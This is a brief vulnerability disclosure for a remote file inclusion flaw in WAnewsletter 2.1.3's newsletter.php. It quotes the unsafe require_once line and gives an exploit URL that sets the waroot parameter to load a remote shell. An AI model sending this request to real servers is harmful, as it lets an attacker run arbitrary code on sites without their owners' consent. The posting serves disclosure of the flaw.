WAnewsletter versions 2.1.3 and below suffer from a remote file inclusion vulnerability.
2c4a5e2ad0a8d376f5ecca5b70779d3ff1387702f86061b358d4e0f809b8f6f7
======================= S==A==U==D==I ========================
WAnewsletter-2.1.3 (newsletter.php) RFI Vul
==============================================================
Found By : Mogatil , jjl@hotmail.com
==============================================================
Script Site : http://script.emanual.ru/get?i=1053
==============================================================
File : /newsletter.php
require_once($waroot . 'start.php');
==============================================================
Thanx: cold zero . gawey Al Azary . crazy man . scorbion_22 .
the_muslim_sniper
==============================================================
Exploit :[Path]/newsletter/newsletter.php?waroot=shell
==============================================================